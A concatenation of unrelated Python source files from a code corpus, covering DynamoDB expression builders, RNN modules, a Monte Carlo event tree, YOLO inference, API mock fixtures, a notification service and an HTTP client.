ser_left = serialize_operand(self.left)
ser_right = serialize_operand(self.right)
expression = (
f"{ser_left['UpdateExpression']} "
f"{self.symbol} "
f"{ser_right['UpdateExpression']}"
)
return {
"UpdateExpression": expression,
"ExpressionAttributeNames": dict(
**ser_left["ExpressionAttributeNames"],
**ser_right["ExpressionAttributeNames"],
),
"ExpressionAttributeValues": dict(
**ser_left["ExpressionAttributeValues"],
**ser_right["ExpressionAttributeValues"],
),
}
class IfNotExistsOperand(UpdateOperand):
"""
Set a value if the given attribute does not exist
"""
def __init__(self, attr, value):
self.attr = attr
self.value = value
def serialize(self):
ser_attr = serialize_operand(self.attr)
ser_value = serialize_operand(self.value)
expression = (
f"if_not_exists({ser_attr['UpdateExpression']}, "
f"{ser_value['UpdateExpression']})"
)
return {
"UpdateExpression": expression,
"ExpressionAttributeNames": dict(
**ser_attr["ExpressionAttributeNames"],
**ser_value["ExpressionAttributeNames"],
),
"ExpressionAttributeValues": dict(
**ser_attr["ExpressionAttributeValues"],
**ser_value["ExpressionAttributeValues"],
),
}
class ListAppendOperand(UpdateOperand):
"""
Combine two lists
"""
def __init__(self, left, right):
self.left = left
self.right = right
def serialize(self):
ser_left = serialize_operand(self.left)
ser_right = serialize_operand(self.right)
expression = (
f"list_append({ser_left['UpdateExpression']}, "
f"{ser_right['UpdateExpression']})"
)
return {
"UpdateExpression": expression,
"ExpressionAttributeNames": dict(
**ser_left["ExpressionAttributeNames"],
**ser_right["ExpressionAttributeNames"],
),
"ExpressionAttributeValues": dict(
**ser_left["ExpressionAttributeValues"],
**ser_right["ExpressionAttributeValues"],
),
}
def list_append(left, right):
"""
Set a value to the combination of two lists in an update expression
"""
return ListAppendOperand(UpdateOperand(left), UpdateOperand(right))
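
if __name__ == "__main__":
    # Minimal local sketch of the API defined above. The table and attribute
    # names are invented for illustration, and nothing here talks to DynamoDB --
    # it only exercises item serialization and update-expression building.
    class Demo(DynamoModel):
        _table_name_ = "demo-table"

        demo_id = Key()
        counter = Attr()

    item = Demo(demo_id="abc", counter=1)
    print(item.serialize())

    update = Demo.counter.set(Demo.counter + 5) & Demo.demo_id.set("abc")
    print(update.serialize()["UpdateExpression"])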
| 2.421875 | 2 |
Losses/__init__.py | SimonTheVillain/ActiveStereoNet | 17 | 5048 | from .supervise import *
def get_losses(name, **kwargs):
name = name.lower()
if name == 'rhloss':
loss = RHLoss(**kwargs)
elif name == 'xtloss':
loss = XTLoss(**kwargs)
else:
raise NotImplementedError('Loss [{:s}] is not supported.'.format(name))
return loss
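
if __name__ == '__main__':
    # Lookup is by lower-cased name and unknown names raise NotImplementedError.
    # Constructor kwargs for RHLoss/XTLoss live in .supervise and are not shown here.
    try:
        get_losses('focal')
    except NotImplementedError as err:
        print(err)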
| 2.171875 | 2 |
model/src/recurrent.py | qkaren/converse_reading_cmr | 87 | 5049 | <filename>model/src/recurrent.py
import torch
import torch.nn as nn
from torch.nn.parameter import Parameter
from torch.nn.utils.rnn import pad_packed_sequence as unpack
from torch.nn.utils.rnn import pack_padded_sequence as pack
from .my_optim import weight_norm as WN
# TODO: use system func to bind ~
RNN_MAP = {'lstm': nn.LSTM, 'gru': nn.GRU, 'rnn': nn.RNN}
class OneLayerBRNN(nn.Module):
def __init__(self, input_size, hidden_size, prefix='stack_rnn', opt={}, dropout=None):
super(OneLayerBRNN, self).__init__()
self.opt = opt
self.prefix = prefix
self.cell_type = self.opt.get('{}_cell'.format(self.prefix), 'lstm')
self.emb_dim = self.opt.get('{}_embd_dim'.format(self.prefix), 0)
self.maxout_on = self.opt.get('{}_maxout_on'.format(self.prefix), False)
self.weight_norm_on = self.opt.get('{}_weight_norm_on'.format(self.prefix), False)
self.dropout = dropout
self.output_size = hidden_size if self.maxout_on else hidden_size * 2
self.hidden_size = hidden_size
self.rnn = RNN_MAP[self.cell_type](input_size, hidden_size, num_layers=1, bidirectional=True)
def forward(self, x, x_mask):
x = x.transpose(0, 1)
size = list(x.size())
rnn_output, h = self.rnn(x)
if self.maxout_on:
rnn_output = rnn_output.view(size[0], size[1], self.hidden_size, 2).max(-1)[0]
# Transpose back
hiddens = rnn_output.transpose(0, 1)
return hiddens
class BRNNEncoder(nn.Module):
def __init__(self, input_size, hidden_size, prefix='rnn', opt={}, dropout=None):
super(BRNNEncoder, self).__init__()
self.opt = opt
        self.dropout = dropout
        self.prefix = prefix
self.cell_type = opt.get('{}_cell'.format(self.prefix), 'gru')
self.weight_norm_on = opt.get('{}_weight_norm_on'.format(self.prefix), False)
self.top_layer_only = opt.get('{}_top_layer_only'.format(self.prefix), False)
self.num_layers = opt.get('{}_num_layers'.format(self.prefix), 1)
self.rnn = RNN_MAP[self.cell_type](input_size, hidden_size, self.num_layers, bidirectional=True)
if self.weight_norm_on:
self.rnn = WN(self.rnn)
if self.top_layer_only:
self.output_size = hidden_size * 2
else:
self.output_size = self.num_layers * hidden_size * 2
def forward(self, x, x_mask):
x = self.dropout(x)
_, h = self.rnn(x.transpose(0, 1).contiguous())
if self.cell_type == 'lstm':
h = h[0]
shape = h.size()
h = h.view(self.num_layers, 2, shape[1], shape[3]).transpose(1,2).contiguous()
h = h.view(self.num_layers, shape[1], 2 * shape[3])
if self.top_layer_only:
return h[-1]
else:
            return h.transpose(0, 1).contiguous().view(x.size(0), -1)
#------------------------------
# Contextual embedding
# TODO: remove packing to speed up
# Credit from: https://github.com/salesforce/cove
#------------------------------
class ContextualEmbedV2(nn.Module):
def __init__(self, model_path, padding_idx=0):
super(ContextualEmbedV2, self).__init__()
state_dict = torch.load(model_path)
self.rnn1 = nn.LSTM(300, 300, num_layers=1, bidirectional=True)
self.rnn2 = nn.LSTM(600, 300, num_layers=1, bidirectional=True)
state_dict1 = dict([(name, param.data) if isinstance(param, Parameter) else (name, param)
for name, param in state_dict.items() if '0' in name])
state_dict2 = dict([(name.replace('1', '0'), param.data) if isinstance(param, Parameter) else (name.replace('1', '0'), param)
for name, param in state_dict.items() if '1' in name])
self.rnn1.load_state_dict(state_dict1)
self.rnn2.load_state_dict(state_dict2)
for p in self.parameters(): p.requires_grad = False
        self.output_size = 600
def setup_eval_embed(self, eval_embed, padding_idx=0):
pass
def forward(self, x, x_mask):
"""A pretrained MT-LSTM (McCann et. al. 2017).
"""
lengths = x_mask.data.eq(0).long().sum(1).squeeze()
lens, indices = torch.sort(lengths, 0, True)
output1, _ = self.rnn1(pack(x[indices], lens.tolist(), batch_first=True))
output2, _ = self.rnn2(output1)
output1 = unpack(output1, batch_first=True)[0]
output2 = unpack(output2, batch_first=True)[0]
_, _indices = torch.sort(indices, 0)
output1 = output1[_indices]
output2 = output2[_indices]
return output1, output2
class ContextualEmbed(nn.Module):
def __init__(self, path, vocab_size, emb_dim=300, embedding=None, padding_idx=0):
super(ContextualEmbed, self).__init__()
self.embedding = nn.Embedding(vocab_size, emb_dim, padding_idx=padding_idx)
if embedding is not None:
self.embedding.weight.data = embedding
state_dict = torch.load(path)
self.rnn1 = nn.LSTM(300, 300, num_layers=1, bidirectional=True)
self.rnn2 = nn.LSTM(600, 300, num_layers=1, bidirectional=True)
state_dict1 = dict([(name, param.data) if isinstance(param, Parameter) else (name, param)
for name, param in state_dict.items() if '0' in name])
state_dict2 = dict([(name.replace('1', '0'), param.data) if isinstance(param, Parameter) else (name.replace('1', '0'), param)
for name, param in state_dict.items() if '1' in name])
self.rnn1.load_state_dict(state_dict1)
self.rnn2.load_state_dict(state_dict2)
for p in self.parameters(): p.requires_grad = False
self.output_size = 600
def setup_eval_embed(self, eval_embed, padding_idx=0):
self.eval_embed = nn.Embedding(eval_embed.size(0), eval_embed.size(1), padding_idx = padding_idx)
self.eval_embed.weight.data = eval_embed
for p in self.eval_embed.parameters():
p.requires_grad = False
def forward(self, x_idx, x_mask):
emb = self.embedding if self.training else self.eval_embed
x_hiddens = emb(x_idx)
lengths = x_mask.data.eq(0).long().sum(1)
lens, indices = torch.sort(lengths, 0, True)
output1, _ = self.rnn1(pack(x_hiddens[indices], lens.tolist(), batch_first=True))
output2, _ = self.rnn2(output1)
output1 = unpack(output1, batch_first=True)[0]
output2 = unpack(output2, batch_first=True)[0]
_, _indices = torch.sort(indices, 0)
output1 = output1[_indices]
output2 = output2[_indices]
return output1, output2
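
if __name__ == '__main__':
    # Shape sanity check for OneLayerBRNN on random data; no pretrained MT-LSTM
    # weights are needed for this layer and the sizes below are arbitrary.
    layer = OneLayerBRNN(input_size=16, hidden_size=8)
    x = torch.randn(2, 5, 16)      # (batch, seq_len, features)
    x_mask = torch.zeros(2, 5)     # mask is not used by this layer's forward
    print(layer(x, x_mask).shape)  # torch.Size([2, 5, 16]), both directions concatenated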
| 2.453125 | 2 |
kmcsim/sim/events_old.py | vlcekl/kmcpy | 0 | 5050 | #!//anaconda/envs/py36/bin/python
#
# File name: kmc_pld.py
# Date: 2018/08/03 09:07
# Author: <NAME>
#
# Description:
#
import numpy as np
from collections import Counter
class EventTree:
"""
Class maintaining a binary tree for random event type lookup
and arrays for choosing specific event.
"""
def __init__(self, rates, events):
self.rates = rates
self.events = events
self.__setup()
def __build_tree(self, e_ratio):
self.event_tree = []
# create event ratio array level 0 - bottom
if len(e_ratio) % 2 == 1:
e_ratio.extend([0.0])
# create the bottom level (rates*numbers)
self.event_tree.append(np.array(e_ratio))
# create partial summs (iteratively) up to the 2nd highest level
while len(e_ratio) > 2:
e_ratio = [e_ratio[i]+e_ratio[i+1] for i in range(0, len(e_ratio), 2)]
if len(e_ratio) % 2 == 1:
e_ratio.extend([0.0])
self.event_tree.append(np.array(e_ratio))
        # create top level = sum of all rates
        self.event_tree.append(np.array(sum(e_ratio)))

        # total rate, used by find_event to draw a random number in [0, Rs)
        self.Rs = float(self.event_tree[-1])
def __setup(self):
# Get dictionary of event type counts
e_counts = Counter([e['type'] for e in self.events])
print(e_counts)
# create a list of events based on event types
self.event_counts = [[] for _ in range(len(self.rates))]
for e in self.events:
self.event_counts[e['type']].append(e)
e_ratio = [e_counts.get(t, 0)*r for t, r in enumerate(self.rates)]
print('e_ratio', e_ratio)
self.__build_tree(e_ratio)
def update_events(self, old_events, new_events):
"""
Update tree: remove old events and add new events
"""
pass
def find_event(self):
"""Find and return an event"""
# generate a random number [0,Rs)
q = self.Rs*np.random.random()
# cycle through levels (top->down)
# start with top-level child (k-2) end with level above bottom (1)
j = 0
for k in range(len(self.event_tree)-2, 0, -1):
# left child value
left = self.event_tree[k][j]
if q < left:
j = 2*j
else:
q -= left
j = 2*j + 1
# bottom level - return selected event type
        if q < self.event_tree[0][j]:
            event_type = j
        else:
            event_type = j + 1

        # select a random event index of a given type
        event_number = np.random.randint(len(self.event_counts[event_type]))

        # get the event object
        event = self.event_counts[event_type][event_number]
return event
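
if __name__ == '__main__':
    # Usage sketch with made-up rates and events: type 0 fires at rate 1.0,
    # type 1 at rate 2.0, and each event is a dict carrying its 'type'.
    rates = [1.0, 2.0]
    events = [{'type': 0, 'name': 'hop'},
              {'type': 0, 'name': 'hop'},
              {'type': 1, 'name': 'swap'}]
    tree = EventTree(rates, events)
    print(tree.find_event())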
| 2.875 | 3 |
env/lib/python3.6/site-packages/odf/meta.py | anthowen/duplify | 5,079 | 5051 | # -*- coding: utf-8 -*-
# Copyright (C) 2006-2007 <NAME>, European Environment Agency
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# Contributor(s):
#
from odf.namespaces import METANS
from odf.element import Element
# Autogenerated
def AutoReload(**args):
return Element(qname = (METANS,'auto-reload'), **args)
def CreationDate(**args):
return Element(qname = (METANS,'creation-date'), **args)
def DateString(**args):
return Element(qname = (METANS,'date-string'), **args)
def DocumentStatistic(**args):
return Element(qname = (METANS,'document-statistic'), **args)
def EditingCycles(**args):
return Element(qname = (METANS,'editing-cycles'), **args)
def EditingDuration(**args):
return Element(qname = (METANS,'editing-duration'), **args)
def Generator(**args):
return Element(qname = (METANS,'generator'), **args)
def HyperlinkBehaviour(**args):
return Element(qname = (METANS,'hyperlink-behaviour'), **args)
def InitialCreator(**args):
return Element(qname = (METANS,'initial-creator'), **args)
def Keyword(**args):
return Element(qname = (METANS,'keyword'), **args)
def PrintDate(**args):
return Element(qname = (METANS,'print-date'), **args)
def PrintedBy(**args):
return Element(qname = (METANS,'printed-by'), **args)
def Template(**args):
args.setdefault('type', 'simple')
return Element(qname = (METANS,'template'), **args)
def UserDefined(**args):
return Element(qname = (METANS,'user-defined'), **args)
| 1.929688 | 2 |
scripts/my_inference.py | Mr-TalhaIlyas/Scaled-YOLOv4 | 0 | 5052 | import os
os.environ['CUDA_VISIBLE_DEVICES'] = '2'
import torch
torch.rand(10)
import torch.nn as nn
import torch.nn.functional as F
import glob
from tqdm import tqdm, trange
print(torch.cuda.is_available())
print(torch.cuda.get_device_name())
print(torch.cuda.current_device())
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
print('Using device:', device)
print()
#Additional Info when using cuda
if device.type == 'cuda':
print(torch.cuda.get_device_name(0))
print('Memory Usage:')
print('Allocated:', round(torch.cuda.memory_allocated(0)/1024**3,1), 'GB')
print('Cached: ', round(torch.cuda.memory_reserved(0)/1024**3,1), 'GB')
import torch.backends.cudnn as cudnn
import numpy as np
import os, cv2
from tqdm import tqdm, trange
import seaborn as sns
from models.experimental import attempt_load
from utils.datasets import LoadStreams, LoadImages
from utils.general import (
check_img_size, non_max_suppression, apply_classifier, scale_coords, xyxy2xywh, plot_one_box, strip_optimizer)
from utils.torch_utils import select_device, load_classifier, time_synchronized
from my_utils import xyxy_2_xyxyo, draw_boxes
# Initialize
device = select_device('')
half = device.type != 'cpu' # half precision only supported on CUDA
def prepare_input(img1, img_size=416, half=True):
img2 = cv2.resize(img1, (img_size, img_size)) # W x H
img2 = img2.transpose(2,0,1)
img2 = img2[np.newaxis, ...]
img2 = torch.from_numpy(img2).to(device) # torch image is ch x H x W
    img2 = img2.half() if half else img2.float()
img2 /= 255.0
return img2
#%%
# Directories
out = '/home/user01/data_ssd/Talha/yolo/op/'
weights = '/home/user01/data_ssd/Talha/yolo/ScaledYOLOv4/runs/exp2_yolov4-csp-results/weights/best_yolov4-csp-results.pt'
source = '/home/user01/data_ssd/Talha/yolo/paprika_y5/valid/images/'
imgsz = 416
conf_thres = 0.4
iou_thres = 0.5
classes = [0,1,2,3,4,5]
class_names = ["blossom_end_rot", "graymold","powdery_mildew","spider_mite",
"spotting_disease", "snails_and_slugs"]
# deleting files in op_dir
filelist = [ f for f in os.listdir(out)]# if f.endswith(".png") ]
for f in tqdm(filelist, desc = 'Deleting old files fro directory'):
os.remove(os.path.join(out, f))
# Load model
model = attempt_load(weights, map_location=device) # load FP32 model
imgsz = check_img_size(imgsz, s=model.stride.max()) # check img_size
if half:
model.half() # to FP16
img_paths = glob.glob('/home/user01/data_ssd/Talha/yolo/paprika_y5/test/images/*.png') + \
glob.glob('/home/user01/data_ssd/Talha/yolo/paprika_y5/test/images/*.jpg')
# Run inference
if device.type != 'cpu':
model(torch.zeros(1, 3, imgsz, imgsz).to(device).type_as(next(model.parameters()))) # run once
#%%
for i in trange(len(img_paths)):
path = img_paths[i]
img1 = cv2.imread(path)
img1 = cv2.cvtColor(img1, cv2.COLOR_BGR2RGB)
img_h, img_w, _ = img1.shape
img2 = prepare_input(img1, 416, half)
# get file name
name = os.path.basename(path)[:-4]
# Inference
t1 = time_synchronized()
pred = model(img2, augment=False)[0]
# Apply NMS
pred = non_max_suppression(pred, conf_thres, iou_thres, classes=classes, agnostic=True)
if pred[0] is not None:
boxes = pred[0].cpu().detach().numpy() # <xmin><ymin><xmax><ymax><confd><class_id>
else:
boxes = np.array([10.0, 20.0, 30.0, 50.0, 0.75, 0]).reshape(1,6) # dummy values
coords_minmax = np.zeros((boxes.shape[0], 4)) # droping 5th value
confd = np.zeros((boxes.shape[0], 1))
class_ids = np.zeros((boxes.shape[0], 1))
# assign
coords_minmax = boxes[:,0:4] # coords
confd = boxes[:,4] # confidence
class_ids = boxes[:,5] # class id
coords_xyminmax = []
det_classes = []
for i in range(boxes.shape[0]):
coords_xyminmax.append(xyxy_2_xyxyo(img_w, img_h, coords_minmax[i]))
det_classes.append(class_names[int(class_ids[i])])
all_bounding_boxnind = []
for i in range(boxes.shape[0]):
bounding_box = [0.0] * 6
bounding_box[0] = det_classes[i]
bounding_box[1] = confd[i]
bounding_box[2] = coords_xyminmax[i][0]
bounding_box[3] = coords_xyminmax[i][1]
bounding_box[4] = coords_xyminmax[i][2]
bounding_box[5] = coords_xyminmax[i][3]
bounding_box = str(bounding_box)[1:-1]# remove square brackets
bounding_box = bounding_box.replace("'",'')# removing inverted commas around class name
bounding_box = "".join(bounding_box.split())# remove spaces in between **here dont give space inbetween the inverted commas "".
all_bounding_boxnind.append(bounding_box)
all_bounding_boxnind = ' '.join(map(str, all_bounding_boxnind))# convert list to string
all_bounding_boxnind=list(all_bounding_boxnind.split(' ')) # convert strin to list
# replacing commas with spaces
for i in range(len(all_bounding_boxnind)):
all_bounding_boxnind[i] = all_bounding_boxnind[i].replace(',',' ')
for i in range(len(all_bounding_boxnind)):
# check if file exiscts else make new
with open(out +'{}.txt'.format(name), "a+") as file_object:
# Move read cursor to the start of file.
file_object.seek(0)
# If file is not empty then append '\n'
data = file_object.read(100)
if len(data) > 0 :
file_object.write("\n")
# Append text at the end of file
file_object.write(all_bounding_boxnind[i])
#%%
import glob, random
import matplotlib.pyplot as plt
import matplotlib as mpl
mpl.rcParams['figure.dpi'] = 300
img_paths = glob.glob('/home/user01/data_ssd/Talha/yolo/paprika_y5/test/images/*.png') + \
glob.glob('/home/user01/data_ssd/Talha/yolo/paprika_y5/test/images/*.jpg')
img_path = random.choice(img_paths)
img1 = cv2.imread(img_path)
img1 = cv2.cvtColor(img1, cv2.COLOR_BGR2RGB)
img_h, img_w, _ = img1.shape
img2 = prepare_input(img1, 416, half)
pred = model(img2, augment=False)[0]
# Apply NMS
pred = non_max_suppression(pred, conf_thres, iou_thres, classes=classes, agnostic=True)
boxes = pred[0].cpu().detach().numpy() # <xmin><ymin><xmax><ymax><confd><class_id>
coords_minmax = np.zeros((boxes.shape[0], 4)) # droping 5th value
confd = np.zeros((boxes.shape[0], 1))
class_ids = np.zeros((boxes.shape[0], 1))
# assign
coords_minmax = boxes[:,0:4] # coords
confd = boxes[:,4] # confidence
class_ids = boxes[:,5] # class id
coords_xyminmax = []
det_classes = []
for i in range(boxes.shape[0]):
coords_xyminmax.append(xyxy_2_xyxyo(img_w, img_h, coords_minmax[i]))
det_classes.append(class_names[int(class_ids[i])])
t = np.asarray(coords_xyminmax)
op = draw_boxes(img1, confd, t, det_classes, class_names, order='xy_minmax', analysis=False)
plt.imshow(op)
print('='*50)
print('Image Name: ', os.path.basename(img_path),img1.shape)
print('\nClass_name ', '| B_box Coords ', '| Confidence')
print('_'*50)
for k in range(len(det_classes)):
print(det_classes[k], t[k], confd[k])
print('='*50) | 2.140625 | 2 |
src/tests/unit/fixtures/endpoint_standard/mock_recommendation.py | fslds/carbon-black-cloud-sdk-python | 24 | 5053 | <reponame>fslds/carbon-black-cloud-sdk-python<filename>src/tests/unit/fixtures/endpoint_standard/mock_recommendation.py<gh_stars>10-100
"""Mock responses for recommendations."""
SEARCH_REQ = {
"criteria": {
"policy_type": ['reputation_override'],
"status": ['NEW', 'REJECTED', 'ACCEPTED'],
"hashes": ['111', '222']
},
"rows": 50,
"sort": [
{
"field": "impact_score",
"order": "DESC"
}
]
}
SEARCH_RESP = {
"results": [
{
"recommendation_id": "91e9158f-23cc-47fd-af7f-8f56e2206523",
"rule_type": "reputation_override",
"policy_id": 0,
"new_rule": {
"override_type": "SHA256",
"override_list": "WHITE_LIST",
"sha256_hash": "32d2be78c00056b577295aa0943d97a5c5a0be357183fcd714c7f5036e4bdede",
"filename": "XprotectService",
"application": {
"type": "EXE",
"value": "FOO"
}
},
"workflow": {
"status": "NEW",
"changed_by": "<EMAIL>",
"create_time": "2021-05-18T16:37:07.000Z",
"update_time": "2021-08-31T20:53:39.000Z",
"comment": "Ours is the fury"
},
"impact": {
"org_adoption": "LOW",
"impacted_devices": 45,
"event_count": 76,
"impact_score": 0,
"update_time": "2021-05-18T16:37:07.000Z"
}
},
{
"recommendation_id": "bd50c2b2-5403-4e9e-8863-9991f70df026",
"rule_type": "reputation_override",
"policy_id": 0,
"new_rule": {
"override_type": "SHA256",
"override_list": "WHITE_LIST",
"sha256_hash": "0bbc082cd8b3ff62898ad80a57cb5e1f379e3fcfa48fa2f9858901eb0c220dc0",
"filename": "sophos ui.msi"
},
"workflow": {
"status": "NEW",
"changed_by": "<EMAIL>",
"create_time": "2021-05-18T16:37:07.000Z",
"update_time": "2021-08-31T20:53:09.000Z",
"comment": "Always pay your debts"
},
"impact": {
"org_adoption": "HIGH",
"impacted_devices": 8,
"event_count": 25,
"impact_score": 0,
"update_time": "2021-05-18T16:37:07.000Z"
}
},
{
"recommendation_id": "0d9da444-cfa7-4488-9fad-e2abab099b68",
"rule_type": "reputation_override",
"policy_id": 0,
"new_rule": {
"override_type": "SHA256",
"override_list": "WHITE_LIST",
"sha256_hash": "2272c5221e90f9762dfa38786da01b36a28a7da5556b07dec3523d1abc292124",
"filename": "mimecast for outlook 7.8.0.125 (x86).msi"
},
"workflow": {
"status": "NEW",
"changed_by": "<EMAIL>",
"create_time": "2021-05-18T16:37:07.000Z",
"update_time": "2021-08-31T15:13:40.000Z",
"comment": "Winter is coming"
},
"impact": {
"org_adoption": "MEDIUM",
"impacted_devices": 45,
"event_count": 79,
"impact_score": 0,
"update_time": "2021-05-18T16:37:07.000Z"
}
}
],
"num_found": 3
}
ACTION_INIT = {
"recommendation_id": "0d9da444-cfa7-4488-9fad-e2abab099b68",
"rule_type": "reputation_override",
"policy_id": 0,
"new_rule": {
"override_type": "SHA256",
"override_list": "WHITE_LIST",
"sha256_hash": "2272c5221e90f9762dfa38786da01b36a28a7da5556b07dec3523d1abc292124",
"filename": "mimecast for outlook 7.8.0.125 (x86).msi"
},
"workflow": {
"status": "NEW",
"changed_by": "<EMAIL>",
"create_time": "2021-05-18T16:37:07.000Z",
"update_time": "2021-08-31T15:13:40.000Z",
"comment": "Winter is coming"
},
"impact": {
"org_adoption": "MEDIUM",
"impacted_devices": 45,
"event_count": 79,
"impact_score": 0,
"update_time": "2021-05-18T16:37:07.000Z"
}
}
ACTION_REQS = [
{
"action": "ACCEPT",
"comment": "Alpha"
},
{
"action": "RESET"
},
{
"action": "REJECT",
"comment": "Charlie"
},
]
ACTION_REFRESH_SEARCH = {
"criteria": {
"status": ['NEW', 'REJECTED', 'ACCEPTED'],
"policy_type": ['reputation_override']
},
"rows": 50
}
ACTION_SEARCH_RESP = {
"results": [ACTION_INIT],
"num_found": 1
}
ACTION_REFRESH_STATUS = ['ACCEPTED', 'NEW', 'REJECTED']
ACTION_INIT_ACCEPTED = {
"recommendation_id": "0d9da444-cfa7-4488-9fad-e2abab099b68",
"rule_type": "reputation_override",
"policy_id": 0,
"new_rule": {
"override_type": "SHA256",
"override_list": "WHITE_LIST",
"sha256_hash": "2272c5221e90f9762dfa38786da01b36a28a7da5556b07dec3523d1abc292124",
"filename": "mimecast for outlook 192.168.3.11 (x86).msi"
},
"workflow": {
"status": "ACCEPTED",
"ref_id": "e9410b754ea011ebbfd0db2585a41b07",
"changed_by": "<EMAIL>",
"create_time": "2021-05-18T16:37:07.000Z",
"update_time": "2021-08-31T15:13:40.000Z",
"comment": "Winter is coming"
},
"impact": {
"org_adoption": "MEDIUM",
"impacted_devices": 45,
"event_count": 79,
"impact_score": 0,
"update_time": "2021-05-18T16:37:07.000Z"
}
}
| 1.5625 | 2 |
monasca/microservice/notification_engine.py | TeamZenith/python-monasca | 0 | 5054 | # Copyright 2015 Carnegie Mellon University
#
# Author: <NAME> <<EMAIL>>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ast
import json
from oslo.config import cfg
from stevedore import driver
from monasca.common import es_conn
from monasca.common import email_sender
from monasca.common import kafka_conn
from monasca.openstack.common import log
from monasca.openstack.common import service as os_service
es_opts = [
cfg.StrOpt('topic',
default='alarm',
help=('The topic that messages will be retrieved from.'
'This also will be used as a doc type when saved '
'to ElasticSearch.')),
cfg.StrOpt('topic2',
default='notification_methods',
help=('The topic that messages will be retrieved from.'
'This also will be used as a doc type when saved '
'to ElasticSearch.')),
cfg.StrOpt('doc_type',
default='',
help=('The document type which defines what document '
'type the messages will be save into. If not '
'specified, then the topic will be used.')),
cfg.StrOpt('processor',
default='',
help=('The message processer to load to process the message.'
'If the message does not need to be process anyway,'
'leave the default')),
]
es_group = cfg.OptGroup(name='notification', title='notification')
cfg.CONF.register_group(es_group)
cfg.CONF.register_opts(es_opts, es_group)
LOG = log.getLogger(__name__)
class NotificationEngine(os_service.Service):
def __init__(self, threads=1000):
super(NotificationEngine, self).__init__(threads)
self._kafka_conn = kafka_conn.KafkaConnection(
cfg.CONF.notification.topic)
# Use doc_type if it is defined.
if cfg.CONF.notification.doc_type:
self._es_conn = es_conn.ESConnection(
cfg.CONF.notification.doc_type)
else:
self._es_conn = es_conn.ESConnection(
cfg.CONF.notification.topic2)
def handle_alarm_msg(self, msg):
if msg and msg.message:
LOG.debug("Message received for alarm: " + msg.message.value)
value = msg.message.value
if value:
# value's format is:
# {
# "metrics": {
# "timestamp": 1432672915.409,
# "name": "biz",
# "value": 1500,
# "dimensions": {
# "key2": "value2",
# "key1": "value1"
# }
# },
# "state_updated_timestamp": 1432672915,
# "state": "ALARM",
# "alarm-definition": {
# "alarm_actions": [
# "c60ec47e-5038-4bf1-9f95-4046c6e9a759"
# ],
# "undetermined_actions": [
# "c60ec47e-5038-4bf1-9f95-4046c6e9a759"
# ],
# "name": "Average CPU percent greater than 10",
# "match_by": [
# "hostname"
# ],
# "description": "The average CPU percent is greater than 10",
# "ok_actions": [
# "c60ec47e-5038-4bf1-9f95-4046c6e9a759"
# ],
# "expression": "max(foo{hostname=mini-mon,mu=na}, 120) > 1100
# and max(bar { asd = asd} )>1200 or avg(biz)>1300",
# "id": "c60ec47e-5038-4bf1-9f95-4046c6e91111",
# "severity": "LOW"
# }
# }
# convert to dict, and get state to determine the actions(notification method id) needed.
# the method id can be used to match the notification method in elasticSearch
# Then an email will be sent (TODO: phone txt msg are not dealt with for now)
dict_msg = ast.literal_eval(value)
state = dict_msg["state"]
if state not in ["ALARM","OK","UNDETERMINED"]:
LOG.error("state of alarm is not defined as expected")
return
actions = []
if state == 'ALARM':
actions = dict_msg["alarm-definition"]["alarm_actions"]
if state == 'OK':
actions = dict_msg["alarm-definition"]["ok_actions"]
if state == 'UNDETERMINED':
actions = dict_msg["alarm-definition"]["undetermined_actions"]
addresses = []
types = []
# the action_id is an id of notification method
# there can be multiple ids in one alarm message with different types
for action_id in actions:
es_res = self._es_conn.get_message_by_id(action_id)
def _get_notification_method_response(res):
if res and res.status_code == 200:
obj = res.json()
if obj:
return obj.get('hits')
return None
else:
return None
es_res = _get_notification_method_response(es_res)
LOG.debug('Query to ElasticSearch returned: %s' % es_res)
if es_res is None:
LOG.error("The provided is not defined as expected")
return
name = es_res["hits"][0]["_source"]["name"]
type = es_res["hits"][0]["_source"]["type"]
address = es_res["hits"][0]["_source"]["address"]
types.append(type)
addresses.append(address)
email_addresses = []
for i in range(len(types)):
if types[i] == "EMAIL":
email_addresses.append(addresses[i])
email_sender.send_emails(email_addresses, "Alarm to User", dict_msg["alarm-definition"]["description"])
def start(self):
while True:
try:
for msg in self._kafka_conn.get_messages():
self.handle_alarm_msg(msg)
# if autocommit is set, this will be a no-op call.
self._kafka_conn.commit()
except Exception:
LOG.exception('Error occurred while handling kafka messages.')
def stop(self):
self._kafka_conn.close()
super(NotificationEngine, self).stop()
| 1.789063 | 2 |
dhf_wrapper/base_client.py | Enflow-io/dhf-pay-python | 0 | 5055 | <gh_stars>0
from typing import Optional, Callable
import requests
from requests.auth import AuthBase
from requests.exceptions import RequestException
class BearerAuth(AuthBase):
def __init__(self, token):
self.token = token
def __call__(self, r):
r.headers['Authorization'] = f'Bearer {self.token}'
return r
class ServiceClient:
DEFAULT_MAX_RETRIES = 0
def __init__(
self,
base_url: str,
token: Optional[str] = None,
):
self.base_url = base_url.rstrip("/")
self.token = token
self.session = self._create_client_session()
def _dispose(self):
"""
Class method to close user session
"""
self.session.close()
def _create_client_session(self):
"""
Class method to create client session
"""
session = requests.Session()
session.auth = self._get_http_auth()
return session
def _get_http_auth(self):
"""
Class method to resolve http authentication
"""
if self.token:
return BearerAuth(self.token)
def make_full_url(self, path: str) -> str:
"""
Class method to make full url
:param path: str
:return: str
"""
return f"{self.base_url}{path}"
def _make_request(self, request: Callable, retries=DEFAULT_MAX_RETRIES, **kwargs) -> dict:
"""
Class method to make request
:param request: Callable
:return: dict
"""
try:
with request(**kwargs) as resp:
resp.raise_for_status()
return resp.json()
except RequestException as e:
            if retries > 0 and e.response is not None and e.response.status_code >= 500:
return self._make_request(request=request, retries=retries - 1, **kwargs)
